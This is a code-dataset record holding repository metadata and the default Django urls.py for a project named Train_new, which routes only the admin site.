"qiuyemingchong@163.com"
] |
qiuyemingchong@163.com
|
ec27f61e3c232a3694137ddddce91e9735b3c6fe
|
da9328c5a135429afeeedf099df62ed8cdf7bec2
|
/Train_new/urls.py
|
6818ea483abdb3d87d10679c0e98ce0a6868723d
|
[] |
no_license
|
dbissa94/Train_new
|
1eb51e670e55ef1fc548f2dd18b1d0c7fbd483e3
|
079ecc335d39a8bbed2f561bd5a2951e4a7a67bb
|
refs/heads/master
| 2020-03-23T15:26:55.024702
| 2018-07-20T19:23:14
| 2018-07-20T19:23:14
| 141,748,975
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 751
|
py
|
"""Train_new URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
urlpatterns = [
path('admin/', admin.site.urls),
]
|
[
"dbissa94@gmail.com"
] |
dbissa94@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.